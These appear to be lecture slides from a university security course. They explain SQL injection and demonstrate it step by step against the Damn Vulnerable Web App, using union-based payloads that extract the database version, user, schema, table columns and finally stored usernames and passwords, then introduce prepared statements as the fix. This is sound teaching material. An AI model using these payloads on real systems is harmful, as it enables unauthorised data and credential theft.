2. Topics
• What is SQL
• What is SQL Injection
• Damn Vulnerable Web App
• SQLI Demo
• Prepared Statements
3. What is SQL?
• Way you communicate with the database
• Structured Query Language
• Access and manipulate databases
• COSC 341 at IUP
4. What is SQL Injection?
• One of the most serious threats for Web Application
• Inject SQL commands into an SQL statement, via web page input.
• Alters an SQL statement and compromises the security of a web
application
• Common with PHP and ASP applications due to the prevalence of
older functional interfaces
• Occurs when
• Data enters a program from an untrusted source.
• The data used to dynamically construct a SQL query
• SQL Injection Harvesting
• SQL statements to render sensitive data
5. Types of SQLI
• Error Based
• Causes an error and gather information from the error
• Union Based
• Combine two or more SQL statements into one result
• Blind
• Asking a true or false question
7. Damn Vulnerable Web Site Demo
• PHP/MySQL web application
• Aid for security professionals
• Test skills and tools in a legal environment
• Help developers better understand the process of securing web applications
8. $getid = “SELECT first_name, last_name FROM users WHERE
user_id = ‘$id’”;
9. Basic Injection
Webpage is supposed to print ID, First name, and Surname
$getid = “SELECT first_name, last_name FROM users WHERE
user_id = ‘1’”;
10. Always True Scenario
• Saying display all records that are false and all
records that are true
• %’ – probably not equal to anything, and will be
false
• ‘0’=‘0’ – Is equal to true, because 0 will always
equal 0
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
‘0’=‘0’”;
11. Display Database Version
• Notice the last displayed line
• This is the version of the mysql
database
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, version() # “;
12. Display Database User
• Notice the last displayed line
• Name of the database user that
executed the behind the scenes
PHP code
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, user() # ;
13. Display Database Name
• Notice the last displayed line
• This is the name of the database
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, database() # ;
14. Display All Tables in the information_schema
• Displays all the tables in the
information_schema database
• INFORMATION_SCHEMA is the
informational database
• Stores information about all other
databases that the MySQL server
maintains
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or
0=0 union select null, table_name from information_schema.tables #” ;
15. Display All User Tables in the
information_schema
• Quicker than looking
through the previous
output and manually
looking for user table
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0
union select null, table_name from information_schema.tables where table_name
like ‘user%’ #” ;
• Displays all tables that start
with the prefix “user” in the
information_schema
database
16. Display all Column fields in the User Table
• Displays all the columns in the users
table
• Notice- user_id, first_name,
last_name, user and password
column
$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and
1=0 union select null, concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #” ;
17. Display column Field Contents in
the user table
• Successfully displayed all the necessary
authentication information in the
database
$getid = “SELECT first_name, last_name FROM
users WHERE user_id = ‘%' and 1=0 union select
null,concat(first_name,0x0a,last_name,0x0a,user,
0x0a,password) from users #” ;
18. Prepared Statements and Bound Parameters
• The query and the data are sent to the SQL server separately
• Parameterized statements, Parameterized SQL
• Template for SQL Statements
• Values can be plugged into the query after the query is “prepared”
and ready to be executed
• (?), Bound Parameters
• Placeholders where actual values are plugged in